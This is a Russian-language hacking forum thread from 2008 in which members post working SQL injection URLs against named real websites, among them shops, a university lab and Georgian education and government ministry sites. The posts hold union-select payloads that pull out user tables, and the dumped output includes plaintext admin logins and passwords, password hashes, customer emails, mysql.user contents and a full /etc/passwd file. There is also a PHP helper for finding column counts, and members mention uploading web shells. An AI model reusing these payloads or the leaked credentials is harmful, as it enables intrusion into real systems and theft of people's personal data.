SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Zircool

    Zircool Elder - Старейшина

    Joined:
    1 Mar 2006
    Messages:
    162
    Likes Received:
    37
    Reputations:
    5
    Сайт: www.haydamaky.com PR=4

    Так и не смог найти таблицу в которой хрянится логин и пас к админке...


    Вот таблицы


    Админка
     
    3 people like this.
  2. Buddah

    Buddah New Member

    Joined:
    26 Nov 2007
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+order+by+107/*
    я новичок, скажите пожалуйста, обязательно нужно просписывать все 107 полей в запросе?
     
  3. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.devmaster.net/articles.php?catID=6+union+select+1,user()/*
    version() - 5.0.45
    database() - Dia_Kharrat_dm_main
    user() - dia@localhost
    result:
    Reedbeta:fd50302fd2f3ef8f527465251903e4fa
    Dia Kharrat:5a69a0668268a34d04333c77d2970949
    Anubis:75352e3845c8c6a61e52893ce8b178b0
    Baldurk:8d761c44f8e4daef212ab80bb8875a6c
    Bladder:86c97024c1cb01ebdd09b4feeffdfa44
     
    2 people like this.
  4. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    [​IMG] openit.com.ua

    Кста, там чувак есть с античата - inlanger

    пароль подходит тока на мыло :D

    Database Version: 5.0.22-log
    Database name: smat6_openit
    User name: smat@localhost

    Юзеры ;)
    Проверил robots.txt

    блин, на бейсике...
    пароль из мускуль: admin : admin_admin
    кто найдет пасс к админке, стукните плз.. или пм :)
     
    3 people like this.
  5. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    ДА, если что то надо достать. Руками собсно этого делать не обязательно, я например пользуюсь такой самопиской

    Code:
    <?php
    for ($i=100; $i<108; $i++) {
    
    echo "<a href='http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=110327+union+select+";
    
       for ($j=1; $j<=$i; $j++) {
       echo $j;
       if ($j!=$i) echo ",";
       };
       
       echo "/*'>$i</a><br>";
    }
    ?>
    
    Установил границы и просматривай ответы. А вообще настолько тупых запросов я еще не видел. Ржите, господа:

    Code:
    SELECT * FROM EVENT LEFT JOIN REGION ON 
    (E_USERREGION_ID=REGION_ID) LEFT JOIN KATEGORIE 
    ON (E_USERKATEGORIE_ID=KATEGORIE_ID) LEFT JOIN 
    BUNDESLAND ON 
    (E_BUNDESLAND_ID=BUNDESLAND_ID) WHERE 
    E_ID=99999999
    
    107!!! полей выборки, из которых нужны макс 20, бедный сервак. :eek:

    Ну и как результат

    Code:
    http://www.germany-tourism.de/ENG/culture_and_events/events.htm?showid=99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,user(),database(),37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,version(),user,password,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107+from+mysql.user/*
    
    Даже не закрыт доступ к db mysql...
     
    1 person likes this.
  6. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    mmogame.ru

    70к+ валидных мэйликов пользуйтесь =):

    http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,LOAD_FILE(0x4579),5,6,7,email+from+mmo_users+limit+0,1000%20--%20&cat=1 Хэши паролей соленые((

    http://mmogame.ru/screenshots/index/?gid=22&sid=-1+union+select+1,2,3,username,5,6,7,password+from+test_promoreklama.users+limit+0,1000%20--%20&cat=1 От базы проморекламы, хэши не соленые, на счету модера 130к+ деревянных, но у него пасс сцуко не шифруется - поэтому скул в паблик, кто откроет может поделится)...

    4sexshop.ru

    Упал только что, а так вот хэш пароля админа

    http://www.4sexshop.ru/shop/goods/%20188999+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,concat(0x3c2f7469746c653e3c68313e,%20%20pass,0x3c2f68313e),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+user.htm

    Админка: admin : ok (нубярко=)

    В админке можете поискать своего озабоченного друга, все данные о клиентах там есть вплоть до прописки :)
     
    #6086 prescott, 31 Jul 2008
    Last edited: 31 Jul 2008
    1 person likes this.
  7. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Это не странные хеши) это MD5(Unix) вроде)

    вот и сами хэши

    [email protected] : $1$LenAr$0GbWVUnw3liEE4HT4Gskm0
    [email protected] : $1$LenAr$vpSwW7oIhLIYn6n5eLL2W.
    [email protected] : $1$LenAr$QGD8EMTZSpBkR72abB8Ak.
     
    #6087 MirA, 31 Jul 2008
    Last edited: 31 Jul 2008
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Paraavis.com - PR 4
    5 версия, смотрим таблы..
    увидев phpbb я сразу кинулся заливать шелл... но тут неудача.... аватарка не загружается и востановления бд не рабоатет......
    planer;patagonia
    дальше.. я увидел таблы с IPB но сам форум так и не нашел...
    пасс и соль поидее....
    какието юзеры..
    еще юзеры..


    Newprint.ru
    нелюблю я мелких...... но приходится)
    вот нужная там табла.. и колонка к ней...
    админка
     
    #6088 sabe, 31 Jul 2008
    Last edited: 31 Jul 2008
  9. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    www.scrapbookingmemories.com.au


    user(): [email protected]
    version(): 4.1.20
    database(): showcase_sbm

    file_priv = Y но права поставлены так что не читаются файлы пользователей :)
    /etc/passwd читается, если верить /etc/redhat-release то система Red Hat Enterprise Linux ES release 4 (Nahant Update 5)

    http://www.scrapbookingmemories.com.au/scraproom/index.php?content=album&user=24377777777777+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,username,password,email),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/users/**/limit/**/2,1/*&coll=1003

    count from users = 2874
    пароли в чистом виде

    доп. инфо:

    /home/scrap/public_html/scraproom/global_includes/select.php

    Code:
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    news:x:9:13:news:/etc/news:
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    rpm:x:37:37::/var/lib/rpm:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
    smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
    pcap:x:77:77::/var/arpwatch:/sbin/nologin
    xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
    apache:x:48:48:Apache:/var/www:/sbin/nologin
    phpmyadmin:x:500:500::/home/phpmyadmin:/bin/bash
    mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
     
    #6089 nicusor, 31 Jul 2008
    Last edited: 31 Jul 2008
  10. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    Сервер там Microsoft-IIS/6.0 стоит.
    Лови админку:

    http://www.newprint.ru/_admin/

    Только чот она грузится долго( У меня такое чувство, то они специально "зашифровались" :-D ... По моему еще какой-то файлик идет после /_admin/ ... .
    Но путь админки - 100% :)
     
    1 person likes this.
  11. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,mail,3,4+from+us/*&sale=3&order=

    Мылы покупателей кому нада... Пассы манагеров нашел, админов нет( Потому что саму админку найти не могу... файлприв вроде нету(
     
  12. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    Для тех у кого уже руки трясутся =)

    http://putana.nu
    http://putana.nu/list.php?link=-30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    Login: rdvi02
    Pass: 247580

    http://sexrobot.ru
    http://sexrobot.ru/list.php?link=711+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://pentboy.ru
    http://pentboy.ru/list.php?link=34637+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://robosex.ru
    http://robosex.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://magdalina.ru
    http://magdalina.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://dosugspb.ru
    http://dosugspb.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://sexmodeli.org
    http://sexmodeli.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://sexmodeli.net
    http://sexmodeli.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://sexmodeli.ru
    http://sexmodeli.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://intimuslugi.org
    http://intimuslugi.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://intimuslugi.net
    http://intimuslugi.net/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://magdalina.org
    http://magdalina.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://intimdosug.org
    http://intimdosug.org/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://mskputana.ru
    http://mskputana.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://spbputana.ru
    http://spbputana.ru/list.php?link=37849+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580

    http://dosugmsk.ru
    http://dosugmsk.ru/list.php?link=30545+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1/*
    rdvi01:247580
     
    3 people like this.
  13. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    админка
    http://www.remeco.ru/login.php
    но не работает


    все таблицы
    http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,table_name,3,4+from+information_schema.tables/**/limit/**/16,99999/*&sale=3&order=


    манагеры
    http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,name,login,pwd,mail),3,4+from+manager/*&sale=3&order=


    пользователи из user1
    http://www.remeco.ru/shops/index.php?cid=500109999+union+select+1,concat_ws(0x3a,id,name,mail,inn,passwd,score,status),3,4+from+user1/*&sale=3&order=
     
    #6093 nicusor, 31 Jul 2008
    Last edited: 31 Jul 2008
    1 person likes this.
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    WarLib.ru - PR 5
    PicHost.ru
    5 ветка..
    юзеры.. но с выводом туповато.. (
     
    #6094 sabe, 31 Jul 2008
    Last edited: 31 Jul 2008
  15. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    [​IMG] expert.com.ua (193.178.145.3)

    Яндекс тИЦ 1200

    Path: /var/www/expert/expert.com.ua/index.php

    Database Version: 4.1.22-log
    Database name: expert
    User name: u_expert@localhost

    Привилегии файл запрещены (
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    ItLab.unn.ru - PR 5
    Нижегородский государственный университет им.Н.И.Лобачевского.
    ЛАБОРАТОРИЯ ИНФОРМАЦИОННЫЕ ТЕХНОЛОГИИ .
    Факультет вычислительной математики и кибернетики.

    5 ветка и таблы..
    админка
    юзеры из другой базы..
    другие юзеры..


    Software.unn.ac.ru
    software.unn.ac.ru/manager/

    также сдесь: Unn.ru - PR 6
    при регистрации можно залить шелл... токо исполнение не полное.. можно чтот придумать..
     
    #6096 sabe, 1 Aug 2008
    Last edited: 1 Aug 2008
  17. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    www.effective.net.ua

    Яндекс тИЦ - 30

    version() = 4.0.27-log
    database() = effectiv_effe
    user() = effectiv_effe@localhost


    http://m2.com.ua

    3 ветка

    http://www.kiis.com.ua

    version() = 5.0.37-log
    user() = [email protected]
    database() = kiis

     
    #6097 MirA, 1 Aug 2008
    Last edited: 1 Aug 2008
    1 person likes this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Teatrdoc.ru - PR 5
    Театр.DOC
    Novochgrad.ru - PR 3
    Новочеркасск. Администрация Города.
     
    #6098 sabe, 1 Aug 2008
    Last edited: 1 Aug 2008
    2 people like this.
  19. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    www.naec.ge
    Examination Center provides Georgian

    http://www.naec.ge/more.php?t=links.php&f=20&su=semassessmentland&rig_no=1&id=-86'+union+select+1,2,3,4,5,6,7,8,concat(username,char(58),passwd),10,11+from+user+limit+0,1/*&lang=eng
    xarebava:naecge

    Login: xarebava
    Pass: naecge
     
    1 person likes this.
  20. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://www.mes.gov.ge/
    Ministry of education and science of Georgia

    http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,id,user,pass,7+from+gov_password/*
    http://www.mes.gov.ge/index.php?module=calendar&month=07&year=2008&search_day=-14'+union+select+1,2,3,concat(table_name,char(58),column_name,char(58),table_schema),5,6,7+from+information_schema.columns/*

    Login:mesarion
    Pass: yvancha
     
Thread Status:
Not open for further replies.